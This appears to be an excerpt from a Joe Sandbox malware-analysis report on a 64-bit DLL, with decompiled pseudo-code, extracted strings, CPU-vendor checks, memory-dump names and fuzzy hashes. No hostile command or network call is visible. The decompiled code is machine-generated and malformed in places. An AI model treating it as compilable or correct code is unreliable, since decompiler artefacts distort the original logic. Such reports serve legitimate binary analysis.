				 *(_t483 + 0x2c) =  *((intOrPtr*)(_t472 + 0x2c));
				 *((intOrPtr*)(_t483 + 0x34)) = 0;
				 *(_t483 + 0x3c) =  *(_t472 + 0x3c);
				goto 0xf30c0a36;
				E000007FE7FEF3062221(_t432,  *_t472,  *((intOrPtr*)(_t472 + 0x10)) +  *_t472);
				r9d =  *(_t472 + 0x18);
				 *(_t439 + 0x28) = _t405;
				 *(_t439 + 0x20) = _t436;
				_t425 = _t439 + 0x98;
				r8d = _t230;
				E000007FE7FEF30C3B13(2, _t353, _t425, _t432,  *((intOrPtr*)(_t472 + 0x10)) +  *_t472);
				if ( *_t425 != 2) goto 0xf30c0844;
				 *_t483 =  *((intOrPtr*)(_t439 + 0x9c));
				 *(_t483 + 0x2c) = 2;
				if ( *((long long*)(_t432 + 8)) == 0) goto 0xf30c0a36;
				_t218 = HeapFree(??, ??, ??);
				goto 0xf30c0a36;
				_t437 =  *((intOrPtr*)(_t432 + 0x10));
				 *(_t483 + 0x10) = _t437;
				asm("movups xmm0, [esi]");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				asm("inc ecx");
				 *((char*)(_t483 + 0x50)) =  *((intOrPtr*)(_t472 + 0x50));
				_t232 =  *(_t472 + 0x3c);
				asm("inc ecx");
				 *(_t483 + 0x28) =  *(_t472 + 0x28);
				 *(_t483 + 0x2c) = _t218;
				 *((intOrPtr*)(_t483 + 0x30)) =  *((intOrPtr*)(_t439 + 0x9c));
				 *((long long*)(_t483 + 0x34)) =  *((intOrPtr*)(_t439 + 0xa0));
				 *(_t483 + 0x3c) = _t232;
				goto 0xf30c0a36;
				_t467 =  *((intOrPtr*)(_t472 + 0x10)) +  *_t472;
				E000007FE7FEF3062221(_t432,  *_t472, _t467);
				r8d =  *(_t472 + 0x28);
				E000007FE7FEF30C41F8(_t232,  *((long long*)(_t432 + 8)), _t432, _t467);
				_t426 =  *((intOrPtr*)(_t432 + 0x10));
				if (_t426 != _t353) goto 0xf30c0954;
				r9d =  *(_t472 + 0x18);
				if (_t467 == 0) goto 0xf30c090a;
				if ( *((intOrPtr*)(_t472 + 0x10)) - _t467 <= 0) goto 0xf30c0908;
				_t329 =  *((char*)( *_t472 + _t467)) - 0xbf;
				if (_t329 > 0) goto 0xf30c090a;
				 *(_t439 + 0x20) = 0xf314d400;
				goto 0xf30c0a5d;
				if (_t329 != 0) goto 0xf30c08f7;
				E000007FE7FEF30C0150();
				if ( *(_t472 + 0x28) != 2) goto 0xf30c0931;
				_t384 = _t439 + 0x98;
				 *_t384 = _t437;
				_t384[4] = _t477;
				if (E000007FE7FEF30BDE7C(_t384) == 0x110000) goto 0xf30c0954;
				if (_t426 !=  *((intOrPtr*)(_t432 + 8))) goto 0xf30c0946;
				_t413 = _t426;
				E000007FE7FEF30A62B2(_t426 -  *((intOrPtr*)(_t432 + 8)), _t432, _t413);
				_t427 =  *((intOrPtr*)(_t432 + 0x10));
				 *((char*)( *_t432 + _t427)) = 0x2f;
				 *((long long*)(_t432 + 0x10)) = _t427 + 1;
				_t386 = _t439 + 0x98;
				 *_t386 = _t437;
				_t386[4] = _t477;
				_t224 = E000007FE7FEF30BDE7C(_t386);
				_t454 = _t439 + 0x98;
				if (_t224 != 0x2f) goto 0xf30c0991;
				_t356 =  *_t454;
				 *_t454 = 1;
				r9d =  *(_t472 + 0x28);
				 *(_t439 + 0x28) =  *((intOrPtr*)(_t454 + 8));
				 *(_t439 + 0x20) = _t356;
				goto 0xf30c09a4;
				 *_t454 = 1;
				r9d =  *(_t472 + 0x28);
				 *(_t439 + 0x28) = _t477;
				 *(_t439 + 0x20) = _t437;
				E000007FE7FEF30C2A68();
				r8d = _t232;
				_t225 = memcpy(_t273 + 0x12, _t273, 9);
				r9d =  *(_t472 + 0x18);
				r10d =  *(_t472 + 0x1c);
				r11d =  *(_t472 + 0x20);
				_t438 = _t439 + 0x70;
				 *((char*)(_t438 + 0x10)) =  *((intOrPtr*)(_t472 + 0x50));
				asm("inc ecx");
				asm("movaps [ebp], xmm0");
				 *((long long*)(_t439 + 0x60)) = _t413;
				 *(_t439 + 0x58) = _t356;
				 *(_t439 + 0x50) =  *(_t472 + 0x28);
				 *(_t439 + 0x48) =  *(_t472 + 0x3e) & 0x0000ffff;
				 *((short*)(_t439 + 0x40)) =  *(_t472 + 0x3c) & 0x0000ffff;
				 *(_t439 + 0x38) = _t438;
				 *(_t439 + 0x30) =  *(_t472 + 0x24);
				 *(_t439 + 0x28) = r11d;
				 *(_t439 + 0x20) = r10d;
				E000007FE7FEF30C3504();
				return _t225;
			}

0x7fef30c01ec
0x7fef30c01ec
0x7fef30c0202
0x7fef30c0208
0x7fef30c0217
0x7fef30c021f
0x7fef30c0222
0x7fef30c0227
0x7fef30c022e
0x7fef30c023d
0x7fef30c0242
0x7fef30c024b
0x7fef30c0252
0x7fef30c025e
0x7fef30c0264
0x7fef30c0270
0x7fef30c027e
0x7fef30c0289
0x7fef30c028f
0x7fef30c0297
0x7fef30c02a0
0x7fef30c02b8
0x7fef30c02c0
0x7fef30c02c8
0x7fef30c02d3
0x7fef30c02db
0x7fef30c02e0
0x7fef30c02e2
0x7fef30c02f4
0x7fef30c02f9
0x7fef30c02ff
0x7fef30c0306
0x7fef30c030c
0x7fef30c0317
0x7fef30c0323
0x7fef30c0330
0x7fef30c0337
0x7fef30c033a
0x7fef30c033e
0x7fef30c034e
0x7fef30c0356
0x7fef30c035a
0x7fef30c0364
0x7fef30c036a
0x7fef30c036f
0x7fef30c0375
0x7fef30c037b
0x7fef30c0384
0x7fef30c0386
0x7fef30c038e
0x7fef30c0395
0x7fef30c039d
0x7fef30c03af
0x7fef30c03bb
0x7fef30c03be
0x7fef30c03ca
0x7fef30c03d0
0x7fef30c03d6
0x7fef30c03e9
0x7fef30c03ed
0x7fef30c03f8
0x7fef30c0408
0x7fef30c041a
0x7fef30c041d
0x7fef30c0425
0x7fef30c0433
0x7fef30c0438
0x7fef30c0443
0x7fef30c0453
0x7fef30c0458
0x7fef30c0469
0x7fef30c0476
0x7fef30c0480
0x7fef30c048d
0x7fef30c0498
0x7fef30c049e
0x7fef30c04a7
0x7fef30c04ac
0x7fef30c04bc
0x7fef30c04c7
0x7fef30c04d1
0x7fef30c04db
0x7fef30c04e6
0x7fef30c04ec
0x7fef30c04f7
0x7fef30c04fc
0x7fef30c0507
0x7fef30c0511
0x7fef30c051b
0x7fef30c0526
0x7fef30c052c
0x7fef30c0531
0x7fef30c0534
0x7fef30c0539
0x7fef30c053c
0x7fef30c0543
0x7fef30c054c
0x7fef30c0554
0x7fef30c0564
0x7fef30c056a
0x7fef30c0575
0x7fef30c0581
0x7fef30c0584
0x7fef30c058f
0x7fef30c0595
0x7fef30c059d
0x7fef30c05aa
0x7fef30c05b0
0x7fef30c05b5
0x7fef30c05bb
0x7fef30c05c0
0x7fef30c05cd
0x7fef30c05d6
0x7fef30c05da
0x7fef30c05df
0x7fef30c05e4
0x7fef30c05e8
0x7fef30c05eb
0x7fef30c05ef
0x7fef30c05f2
0x7fef30c05fe
0x7fef30c0602
0x7fef30c0607
0x7fef30c060f
0x7fef30c061d
0x7fef30c0622
0x7fef30c0632
0x7fef30c0635
0x7fef30c0639
0x7fef30c063d
0x7fef30c0641
0x7fef30c0647
0x7fef30c064c
0x7fef30c064f
0x7fef30c0653
0x7fef30c065b
0x7fef30c065f
0x7fef30c0662
0x7fef30c0667
0x7fef30c066c
0x7fef30c0670
0x7fef30c0675
0x7fef30c067a
0x7fef30c067f
0x7fef30c0683
0x7fef30c0688
0x7fef30c0693
0x7fef30c0696
0x7fef30c069b
0x7fef30c06a1
0x7fef30c06a6
0x7fef30c06ac
0x7fef30c06b1
0x7fef30c06c0
0x7fef30c06c5
0x7fef30c06d5
0x7fef30c06d8
0x7fef30c06ef
0x7fef30c06f9
0x7fef30c06fc
0x7fef30c0712
0x7fef30c0715
0x7fef30c0720
0x7fef30c0727
0x7fef30c0729
0x7fef30c0739
0x7fef30c073c
0x7fef30c0747
0x7fef30c0754
0x7fef30c0759
0x7fef30c075e
0x7fef30c0761
0x7fef30c0763
0x7fef30c0772
0x7fef30c0777
0x7fef30c077b
0x7fef30c077f
0x7fef30c0782
0x7fef30c0786
0x7fef30c078c
0x7fef30c0792
0x7fef30c079c
0x7fef30c07af
0x7fef30c07b4
0x7fef30c07b8
0x7fef30c07bc
0x7fef30c07c4
0x7fef30c07c8
0x7fef30c07df
0x7fef30c07e4
0x7fef30c07e9
0x7fef30c07ee
0x7fef30c07f3
0x7fef30c0801
0x7fef30c0804
0x7fef30c080e
0x7fef30c0817
0x7fef30c081a
0x7fef30c0827
0x7fef30c0839
0x7fef30c083f
0x7fef30c0853
0x7fef30c0857
0x7fef30c085b
0x7fef30c085e
0x7fef30c0862
0x7fef30c0868
0x7fef30c086e
0x7fef30c0878
0x7fef30c0881
0x7fef30c0886
0x7fef30c088b
0x7fef30c088f
0x7fef30c0893
0x7fef30c0897
0x7fef30c089b
0x7fef30c089f
0x7fef30c08ad
0x7fef30c08b6
0x7fef30c08bb
0x7fef30c08c5
0x7fef30c08ca
0x7fef30c08d6
0x7fef30c08d8
0x7fef30c08e4
0x7fef30c08ee
0x7fef30c08f0
0x7fef30c08f5
0x7fef30c08fe
0x7fef30c0903
0x7fef30c0908
0x7fef30c090d
0x7fef30c0914
0x7fef30c0916
0x7fef30c091e
0x7fef30c0921
0x7fef30c092f
0x7fef30c0935
0x7fef30c093a
0x7fef30c093d
0x7fef30c0942
0x7fef30c0949
0x7fef30c0950
0x7fef30c0954
0x7fef30c095c
0x7fef30c095f
0x7fef30c0963
0x7fef30c0968
0x7fef30c0973
0x7fef30c0975
0x7fef30c097c
0x7fef30c0980
0x7fef30c0985
0x7fef30c098a
0x7fef30c098f
0x7fef30c0991
0x7fef30c0995
0x7fef30c099a
0x7fef30c099f
0x7fef30c09a9
0x7fef30c09ae
0x7fef30c09c1
0x7fef30c09c4
0x7fef30c09c9
0x7fef30c09ce
0x7fef30c09dd
0x7fef30c09e2
0x7fef30c09e5
0x7fef30c09eb
0x7fef30c0a00
0x7fef30c0a05
0x7fef30c0a0a
0x7fef30c0a0e
0x7fef30c0a13
0x7fef30c0a18
0x7fef30c0a1d
0x7fef30c0a21
0x7fef30c0a26
0x7fef30c0a31
0x7fef30c0a4a

APIs

HeapFree.KERNEL32 ref: 000007FEF30C0564
HeapFree.KERNEL32 ref: 000007FEF30C0839

Strings

//file://, xrefs: 000007FEF30C06DC

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: //file://
API String ID: 3298025750-2625762916
Opcode ID: c59d030248d74803d25c38b299ea2339cc26be9ab3e7d33104a9cf05bc2aac48
Instruction ID: bd3552435ba7becd18c317b78f96d6b8f75a736d6cbf5aa81bda29bc8ad26067
Opcode Fuzzy Hash: c59d030248d74803d25c38b299ea2339cc26be9ab3e7d33104a9cf05bc2aac48
Instruction Fuzzy Hash: D3329272A087818AE7B08F15E0447AE77A6F359BC4F059127DE8D03BA5DB3CE584DB04

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3069E30 Relevance: 4.4, Strings: 3, Instructions: 642COMMON

Download Yara Rule

Strings

assertion failed: !self.common.is_zero(a), xrefs: 000007FEF306A99A
called `Result::unwrap()` on an `Err` value, xrefs: 000007FEF306A953
@, xrefs: 000007FEF3069E68

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: @$assertion failed: !self.common.is_zero(a)$called `Result::unwrap()` on an `Err` value
API String ID: 0-1555543952
Opcode ID: dac165ff24fc58f98b4a804134ad9452c12aa9c72f6c4745c6b64fd2f465b15e
Instruction ID: 0cf0ad18bb0064074cd721de917a8fba872a51df50850eaffc76114f08771d13
Opcode Fuzzy Hash: dac165ff24fc58f98b4a804134ad9452c12aa9c72f6c4745c6b64fd2f465b15e
Instruction Fuzzy Hash: EB62D871A08AC591EA219F29E4053FAA3B1FFD5798F445212EF8C13769EF39D286D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3100100 Relevance: 4.0, Strings: 3, Instructions: 287
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E000007FE7FEF3100100(signed int __edx, void* __ebp, signed int __rax, signed int __rcx, unsigned int __r8, signed int __r11) {
				signed int _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t118;
				signed long long _t127;
				signed long long _t139;
				signed long long _t143;
				signed long long _t146;
				void* _t149;
				signed long long _t150;
				signed long long _t152;
				signed long long _t166;
				signed long long _t167;
				signed long long _t194;
				signed long long _t197;
				signed int _t206;
				signed long long _t208;
				signed long long _t210;
				signed long long _t211;
				unsigned long long _t240;
				unsigned long long _t244;
				signed long long _t246;

				asm("cpuid");
				r15d = 0;
				if (0 == 0) goto 0xf31004f5;
				asm("cpuid");
				_t152 = _t150;
				r8d = __edx;
				r9d = 0;
				if (0 - 7 < 0) goto 0xf310015a;
				asm("cpuid");
				_t244 = _t152;
				goto 0xf310015f;
				r13d = 0;
				_v72 = __rax;
				r15d = 0;
				asm("cpuid");
				_v92 = 0;
				_v88 = _t206;
				_v96 = r10d;
				_v76 = 0;
				if (0x80000000 == 0) goto 0xf310019e;
				asm("cpuid");
				r15d = 0;
				r12d = r9d;
				r11d = r9d;
				r11d = r11d & 0x00000001;
				r10d = r12d;
				r10d = r10d & 0x00000202;
				r14d = r12d;
				r14d = r14d & 0x00002000;
				_t166 = __rcx << 5;
				_v80 = r13d;
				_t208 = _t244 >> 0xf;
				_t167 = _t166 << 0x1c;
				_t194 = (_t240 >> 0x0000001c | _t166) << 0x00000011 | __r8 >> 0x00000012 | _t240 >> 0x0000001c | _t166;
				r8d = r8d & 0x000000c0;
				_t127 = _t244 >> 0x00000010 | _t152 << 0x00000025 | _t167;
				r14d = r13d;
				r14d = r14d & 0x00000100;
				r9d =  !r9d;
				if ((r9d & 0x0c000000) != 0) goto 0xf3100446;
				if (( !(E000007FE7FEF30A60A0(r9d >> 0x00000019 & 0, _t127, _t194)) & 0x00000006) != 0) goto 0xf3100446;
				if (_v76 - 0xc <= 0) goto 0xf3100323;
				asm("cpuid");
				r8d = _v92;
				if ((r13d & 0) != 0xe0) goto 0xf3100454;
				_t197 = _t244 >> 7;
				r13d = r13d & 0x00100000;
				_t139 = (_t127 << 0x00000010 << 0x00000029 | _t194 << 0x0000002c | ((_t167 | _t150 | __r11 << 0x00000008 | _t246 << 0x00000021 | _t240 >> 0x00000009 | _t211 << 0x00000011 | __rax) << 0x00000021 | _t127) << 0x0000002b | _t246 << 0x00000021 << 0x0000001d | (_t167 | _t150 | __r11 << 0x00000008 | _t246 << 0x00000021 | _t240 >> 0x00000009 | _t211 << 0x00000011 | __rax) << 0x00000021 | _t127 | __r8 >> 0x00000013 | _t194 | _t208 | _t167 | _t150 | __r11 << 0x00000008 | _t246 << 0x00000021 | _t240 >> 0x00000009 | _t211 << 0x00000011 | __rax | _t127 << 0x00000010 | _t240 << 0x00000017 << 0x0000000a) + (_t240 << 0x00000017 << 0x0000000a) * 0x00000004 | _t197 | _t244 >> 0x00000009 | _t244 >> 0x0000000b | _t244 >> 0x0000000a | 0x00004000 & (_t240 >> 0x0000000e | _t240 << 0x00000017) | _t240 << 0x00000017 << 0x0000000a | _t127 << 0x00000010 << 0x00000029 | _t194 << 0x0000002c | ((_t167 | _t150 | __r11 << 0x00000008 | _t246 << 0x00000021 | _t240 >> 0x00000009 | _t211 << 0x00000011 | __rax) << 0x00000021 | _t127) << 0x0000002b | _t246 << 0x00000021 << 0x0000001d | (_t167 | _t150 | __r11 << 0x00000008 | _t246 << 0x00000021 | _t240 >> 0x00000009 | _t211 << 0x00000011 | __rax) << 0x00000021 | _t127 | __r8 >> 0x00000013 | _t194 | _t208 | _t167 | _t150 | __r11 << 0x00000008 | _t246 << 0x00000021 | _t240 >> 0x00000009 | _t211 << 0x00000011 | __rax | _t127 << 0x00000010;
				_t183 =  >=  ? _t139 : _t139 | 0x00400000;
				_t143 = _t139 << 0x00000017 << 0x00000014 | _t197 << 0x0000001b | _t139 << 0x00000017 | ( >=  ? _t139 : _t139 | 0x00400000);
				_t118 = r14d & 0x00000100;
				_t186 =  ==  ? _t143 : 0x08000000 | _t143;
				r14d = r14d << 0xb;
				r14d = r14d & 0x02000000;
				goto 0xf3100454;
				r8d = _v92;
				_t146 = _t143 << 0x00000013 << 0x00000021 | _v72 | _t143 << 0x00000013 | 0x08000000;
				_t187 = ( ==  ? _t143 : 0x08000000 | _t143) | _v88 << 0x00000020;
				if (_t118 == 0) goto 0xf31004a5;
				if (_t118 != 0) goto 0xf31004c2;
				_t188 = (( ==  ? _t143 : 0x08000000 | _t143) | _v88 << 0x00000020) << 6;
				r15d = r15d & 0x00200000;
				goto 0xf31004f5;
				_t189 = (( ==  ? _t143 : 0x08000000 | _t143) | _v88 << 0x00000020) << 0x00000006 ^ 0x756e6547;
				_t266 =  !=  ? _t146 : 0xffffffff & _t146;
				_t210 = _t208 ^ 0x6c65746e | (( ==  ? _t143 : 0x08000000 | _t143) | _v88 << 0x00000020) << 0x00000006 ^ 0x756e6547;
				_t267 =  !=  ? _t146 :  !=  ? _t146 : 0xffffffff & _t146;
				 *0xf319cfa8 = 0xffffffcfffffffff;
				_t149 =  !=  ? _t146 :  !=  ? _t146 : 0xffffffff & _t146;
				return r15d & 0x00000020;
			}

0x7fef3100117
0x7fef310011c
0x7fef3100121
0x7fef3100137
0x7fef3100139
0x7fef310013c
0x7fef310013f
0x7fef3100145
0x7fef3100151
0x7fef3100153
0x7fef3100158
0x7fef310015a
0x7fef310015f
0x7fef3100164
0x7fef3100171
0x7fef3100178
0x7fef310017c
0x7fef3100181
0x7fef3100186
0x7fef310018a
0x7fef3100196
0x7fef310019b
0x7fef310019e
0x7fef31001a1
0x7fef31001a4
0x7fef31001ac
0x7fef31001af
0x7fef31001b6
0x7fef31001b9
0x7fef31001f0
0x7fef3100201
0x7fef310020c
0x7fef310021c
0x7fef3100265
0x7fef310026c
0x7fef3100288
0x7fef3100298
0x7fef310029b
0x7fef31002ac
0x7fef31002b6
0x7fef31002c8
0x7fef31002e8
0x7fef31002f7
0x7fef3100357
0x7fef3100365
0x7fef310038e
0x7fef31003b6
0x7fef31003cd
0x7fef31003df
0x7fef310040c
0x7fef310041c
0x7fef3100423
0x7fef3100433
0x7fef3100437
0x7fef3100444
0x7fef3100446
0x7fef310045e
0x7fef3100467
0x7fef3100487
0x7fef31004a3
0x7fef31004ab
0x7fef31004af
0x7fef31004c0
0x7fef31004cc
0x7fef31004ea
0x7fef31004ee
0x7fef31004f1
0x7fef3100502
0x7fef3100509
0x7fef310051c

Strings

Authenti, xrefs: 000007FEF310046D
HygonGen, xrefs: 000007FEF3100489
GenuineI, xrefs: 000007FEF31004C2

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: Authenti$GenuineI$HygonGen
API String ID: 0-696657513
Opcode ID: 62d6c06474a2084dfa6f6c158ae8a35a349609b71ba5010ed45b8413c278a244
Instruction ID: 5863b73a291d846874a130da796003ea40f5b481f7cfb73c04e5ca889bc9ef9b
Opcode Fuzzy Hash: 62d6c06474a2084dfa6f6c158ae8a35a349609b71ba5010ed45b8413c278a244
Instruction Fuzzy Hash: 5C813AB3B35A504BFF988915BC6237A58D2B3887D8F087039EE5F9BB85D97CD9408601

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF304415C Relevance: 3.1, Strings: 2, Instructions: 582COMMON

Download Yara Rule

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30447B4, 000007FEF3044B82, 000007FEF3044B9C, 000007FEF3044BAC, 000007FEF3044BE5
@, xrefs: 000007FEF3044578

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: @$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 0-1226984507
Opcode ID: b2058e57732af92ad1a793c2ef232f0f5cda8a34e215a60af84ab2dabe87bd1e
Instruction ID: 5ba6fe4ec2bc1103f59da0657b00bb44d6b67e36dc98a3aa413815232b0293bb
Opcode Fuzzy Hash: b2058e57732af92ad1a793c2ef232f0f5cda8a34e215a60af84ab2dabe87bd1e
Instruction Fuzzy Hash: 5942A262919FC595E7235B2CA0067F5E3A4FFA5788F40D322DFD832665EB38D2829300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30B209F Relevance: 3.0, Strings: 2, Instructions: 469
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E000007FE7FEF30B209F(void* __eax, void* __ecx, void* __eflags, long long __rcx, void* __rdx, void* __r8, void* __r11) {
				signed char _t248;
				void* _t262;
				unsigned long long _t275;
				void* _t325;
				unsigned long long _t354;
				unsigned long long _t366;
				unsigned long long _t378;
				unsigned long long _t390;
				signed long long _t392;
				intOrPtr _t398;
				unsigned long long _t429;
				unsigned long long _t430;
				unsigned long long _t431;
				unsigned long long _t432;
				long long _t440;
				unsigned long long _t441;
				long long _t444;
				long long* _t447;
				unsigned long long* _t450;
				void* _t451;
				unsigned long long* _t459;
				void* _t461;
				void* _t462;
				void* _t469;
				void* _t475;

				_t468 = __r11;
				_t325 = __eflags;
				_t475 = __rdx;
				_t444 = __rcx;
				_t440 = __r8 - 1;
				if (__eflags == 0) goto 0xf30b2502;
				if (__eflags != 0) goto 0xf30b250a;
				E000007FE7FEF30694DF(1, 0xaaaaaaab >> 1, 0xaaaaaaab);
				r11d = 0;
				_t455 =  <  ? __r11 : __r8 - 0x1a;
				if (_t325 <= 0) goto 0xf30b23a1;
				r11d = 0;
				_t15 = _t468 + 0x1a; // 0x1a
				if (_t15 - __r8 > 0) goto 0xf30b26ea;
				if (0xaaaaaaab == 0) goto 0xf30b26f6;
				if (0xaaaaaaab - 0xaaaaaaab > 0) goto 0xf30b2708;
				_t354 =  *((intOrPtr*)(_t475 + __r11));
				asm("dec eax");
				 *0xAAAAAAAAAB658638 =  *((intOrPtr*)((_t354 >> 0x3a) + 0xf31044f0));
				 *0xAAAAAAAAAB658639 =  *((intOrPtr*)((_t354 >> 0x34) + 0xf31044f0));
				 *0xAAAAAAAAAB65863A =  *((intOrPtr*)((_t354 >> 0x2e) + 0xf31044f0));
				 *0xAAAAAAAAAB65863B =  *((intOrPtr*)((_t354 >> 0x28) + 0xf31044f0));
				 *0xAAAAAAAAAB65863C =  *((intOrPtr*)((_t354 >> 0x22) + 0xf31044f0));
				_t429 = _t354 >> 0x1c;
				 *0xAAAAAAAAAB65863D =  *((intOrPtr*)(_t429 + 0xf31044f0));
				 *0xAAAAAAAAAB65863E =  *((intOrPtr*)(_t429 + 0xf31044f0));
				 *0xAAAAAAAAAB65863F =  *((intOrPtr*)(_t354 + 0xf31044f0));
				_t430 =  *((intOrPtr*)(_t475 + __r11 + 6));
				asm("dec eax");
				 *0xAAAAAAAAAB658640 =  *((intOrPtr*)((_t430 >> 0x3a) + 0xf31044f0));
				 *0xAAAAAAAAAB658641 =  *((intOrPtr*)((_t430 >> 0x34) + 0xf31044f0));
				 *0xAAAAAAAAAB658642 =  *((intOrPtr*)((_t430 >> 0x2e) + 0xf31044f0));
				 *0xAAAAAAAAAB658643 =  *((intOrPtr*)((_t430 >> 0x28) + 0xf31044f0));
				 *0xAAAAAAAAAB658644 =  *((intOrPtr*)((_t430 >> 0x22) + 0xf31044f0));
				_t366 = _t430 >> 0x1c;
				 *0xAAAAAAAAAB658645 =  *((intOrPtr*)(_t366 + 0xf31044f0));
				 *0xAAAAAAAAAB658646 =  *((intOrPtr*)(_t366 + 0xf31044f0));
				 *0xAAAAAAAAAB658647 =  *((intOrPtr*)(_t430 + 0xf31044f0));
				_t431 =  *((intOrPtr*)(_t475 + __r11 + 0xc));
				asm("dec eax");
				 *0xAAAAAAAAAB658648 =  *((intOrPtr*)((_t431 >> 0x3a) + 0xf31044f0));
				 *0xAAAAAAAAAB658649 =  *((intOrPtr*)((_t431 >> 0x34) + 0xf31044f0));
				 *0xAAAAAAAAAB65864A =  *((intOrPtr*)((_t431 >> 0x2e) + 0xf31044f0));
				 *0xAAAAAAAAAB65864B =  *((intOrPtr*)((_t431 >> 0x28) + 0xf31044f0));
				 *0xAAAAAAAAAB65864C =  *((intOrPtr*)((_t431 >> 0x22) + 0xf31044f0));
				_t378 = _t431 >> 0x1c;
				 *0xAAAAAAAAAB65864D =  *((intOrPtr*)(_t378 + 0xf31044f0));
				 *0xAAAAAAAAAB65864E =  *((intOrPtr*)(_t378 + 0xf31044f0));
				 *0xAAAAAAAAAB65864F =  *((intOrPtr*)(_t431 + 0xf31044f0));
				_t432 =  *((intOrPtr*)(_t475 + __r11 + 0x12));
				asm("dec eax");
				 *0xAAAAAAAAAB658650 =  *((intOrPtr*)((_t432 >> 0x3a) + 0xf31044f0));
				 *0xAAAAAAAAAB658651 =  *((intOrPtr*)((_t432 >> 0x34) + 0xf31044f0));
				 *0xAAAAAAAAAB658652 =  *((intOrPtr*)((_t432 >> 0x2e) + 0xf31044f0));
				 *0xAAAAAAAAAB658653 =  *((intOrPtr*)((_t432 >> 0x28) + 0xf31044f0));
				 *0xAAAAAAAAAB658654 =  *((intOrPtr*)((_t432 >> 0x22) + 0xf31044f0));
				_t390 = _t432 >> 0x1c;
				 *0xAAAAAAAAAB658655 =  *((intOrPtr*)(_t390 + 0xf31044f0));
				 *0xAAAAAAAAAB658656 =  *((intOrPtr*)(_t390 + 0xf31044f0));
				 *0xAAAAAAAAAB658657 =  *((intOrPtr*)(_t432 + 0xf31044f0));
				_t469 = __r11 + 0x18;
				_t329 = _t469 - ( <  ? __r11 : __r8 - 0x1a);
				if (_t469 - ( <  ? __r11 : __r8 - 0x1a) <= 0) goto 0xf30b2133;
				 *((long long*)(_t451 + 0x38)) = 0xaaaaaaab;
				 *((long long*)(_t451 + 0x48)) = _t444;
				 *((long long*)(_t451 + 0x40)) = _t440;
				_t461 = __r8 - _t440;
				if (_t469 - _t461 >= 0) goto 0xf30b2464;
				if (_t469 - 0xfffffffc > 0) goto 0xf30b2711;
				_t123 = _t469 + 3; // -21
				_t441 = _t123;
				if (_t441 - __r8 > 0) goto 0xf30b2721;
				if (0xaaaaaaab - 0xfffffffb > 0) goto 0xf30b2734;
				if (0xaaaaaaaaaaaaaaaf - 0xaaaaaaab > 0) goto 0xf30b2746;
				 *0xAAAAAAAAAB658658 =  *((intOrPtr*)(0x7fef3cb209d));
				bpl = bpl << 4;
				 *0xAAAAAAAAAB658659 =  *((intOrPtr*)(0xaaaab2a99dbaefbb));
				 *0xAAAAAAAAAB65865A =  *((intOrPtr*)(_t390 + 0xf31044f0));
				 *0xAAAAAAAAAB65865B =  *((intOrPtr*)(0xaaaab2a99dbaefbb));
				if (_t441 - _t461 < 0) goto 0xf30b23c6;
